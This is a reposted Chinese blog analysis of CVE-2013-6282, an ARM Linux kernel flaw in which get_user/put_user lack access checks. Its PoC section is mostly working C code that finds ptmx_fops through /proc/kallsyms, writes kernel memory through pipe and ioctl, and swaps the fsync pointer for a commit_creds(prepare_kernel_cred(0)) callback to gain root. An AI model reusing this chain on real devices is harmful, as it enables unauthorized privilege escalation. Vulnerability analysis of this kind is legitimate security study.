Missing access checks in put_user/get_user kernel API (CVE-2013-6282)

转:http://blog.youkuaiyun.com/hu3167343/article/details/34454381

/*

本文章由 莫灰灰 编写，转载请注明出处。  

作者：莫灰灰    邮箱： minzhenfei@163.com

*/

1.漏洞成因

Linux kernel对ARM上的get_user/put_user缺少访问权限检查，本地攻击者可利用此漏洞读写内核内存，获取权限提升。

2.受影响的系统

Linux kernel 3.2.2
Linux kernel 3.2.13
Linux kernel 3.2.1

3.PoC分析

（1）从/proc/kallsyms文件中获得数据结构ptmx_fops的地址

[cpp] view plain copy

1. void *ptmx_fops = kallsyms_get_symbol_address("ptmx_fops");  
2. unsigned int ptmx_fops_fsync_address = (unsigned int)ptmx_fops + 0x38;  

[cpp] view plain copy

1. static void *kallsyms_get_symbol_address(const char *symbol_name)  
2. {  
3.     FILE *fp;  
4.     char function[BUFSIZ];  
5.     char symbol;  
6.     void *address;  
7.     int ret;  
8.   
9.     fp = fopen("/proc/kallsyms", "r");  
10.     if (!fp) {  
11.         printf("Failed to open /proc/kallsyms due to %s.", strerror(errno));  
12.         return 0;  
13.     }  
14.   
15.     while(!feof(fp)) {  
16.         ret = fscanf(fp, "%p %c %s", &address, &symbol, function);  
17.         if (ret != 3) {  
18.             break;  
19.         }  
20.   
21.         if (!strcmp(function, symbol_name)) {  
22.             fclose(fp);  
23.             return address;  
24.         }  
25.     }  
26.     fclose(fp);  
27.   
28.     return NULL;  
29. }  

（2）找到fsync的地址，即ptmx_fops+0x38的地方

[cpp] view plain copy

1. static struct file_operations ptmx_fops;  

[cpp] view plain copy

1. struct file_operations {  
2.     struct module *owner;  
3.     loff_t (*llseek) (struct file *, loff_t, int);  
4.     ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);  
5.     ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);  
6.     ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);  
7.     ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);  
8.     int (*iterate) (struct file *, struct dir_context *);  
9.     unsigned int (*poll) (struct file *, struct poll_table_struct *);  
10.     long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);  
11.     long (*compat_ioctl) (struct file *, unsigned int, unsigned long);  
12.     int (*mmap) (struct file *, struct vm_area_struct *);  
13.     int (*open) (struct inode *, struct file *);  
14.     int (*flush) (struct file *, fl_owner_t id);  
15.     int (*release) (struct inode *, struct file *);  
16.     int (*fsync) (struct file *, loff_t, loff_t, int datasync);  
17.     int (*aio_fsync) (struct kiocb *, int datasync);  
18.     <span style="color:#ff0000;"><strong>int (*fasync) (int, struct file *, int);</strong></span>  
19.     int (*lock) (struct file *, int, struct file_lock *);  
20.     ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);  
21.     unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);  
22.     int (*check_flags)(int);  
23.     int (*flock) (struct file *, int, struct file_lock *);  
24.     ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);  
25.     ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);  
26.     int (*setlease)(struct file *, long, struct file_lock **);  
27.     long (*fallocate)(struct file *file, int mode, loff_t offset,  
28.               loff_t len);  
29.     int (*show_fdinfo)(struct seq_file *m, struct file *f);  
30. };  

（3）替换fsync函数指针为自己的函数

[cpp] view plain copy

1. if(pipe_write_value_at_address( ptmx_fops_fsync_address,(unsigned int)&ptmx_fsync_callback )){  

ptmx_fsync_callback函数可以使本进程得到权限提升

[cpp] view plain copy

1. /*  obtain_root_privilege - userland callback function 
2. We set ptmx_fops.fsync to the address of this function 
3. Calling fysnc on the open /dev/ptmx file descriptor will result 
4. in this function being called in the kernel context 
5. We can the call the prepare/commit creds combo to escalate the 
6. processes priveledge.    
7. */  
8. static void ptmx_fsync_callback(void)  
9. {  
10.     commit_creds(prepare_kernel_cred(0));  
11. }  

pipe_write_value_at_address函数底层通过put_user函数改写内核地址内容

[cpp] view plain copy

1. static unsigned int pipe_write_value_at_address(unsigned long address, unsigned int value)  
2. {  
3.     char data[4];  
4.     int pipefd[2];  
5.     int i;  
6.   
7.     *(long *)&data = value;  
8.   
9.     if (pipe(pipefd) == -1) {  
10.         perror("pipe");  
11.         return 1;  
12.     }  
13.   
14.     for (i = 0; i < (int) sizeof(data) ; i++) {  
15.         char buf[256];  
16.         buf[0] = 0;  
17.         if (data[i]) {  
18.             if (write(pipefd[1], buf, data[i]) != data[i]) {  
19.                 printf("error in write().\n");  
20.                 break;  
21.             }  
22.         }  
23.   
24.         if (ioctl(pipefd[0], FIONREAD, (void *)(address + i)) == -1) {  
25.             perror("ioctl");  
26.             break;  
27.         }  
28.   
29.         if (data[i]) {  
30.             if (read(pipefd[0], buf, sizeof buf) != data[i]) {  
31.                 printf("error in read().\n");  
32.                 break;  
33.             }  
34.         }  
35.     }  
36.   
37.     close(pipefd[0]);  
38.     close(pipefd[1]);  
39.   
40.     return (i == sizeof (data));  
41. }  

（4）手动调用fsync函数，触发自己的hook函数，得到权限提升

[cpp] view plain copy

1. int fd = open(PTMX_DEVICE, O_WRONLY);  
2. if(!fd) return 1;   
3. fsync(fd);  
4. close(fd);  

4.修复

在put_user之前加了个地址判断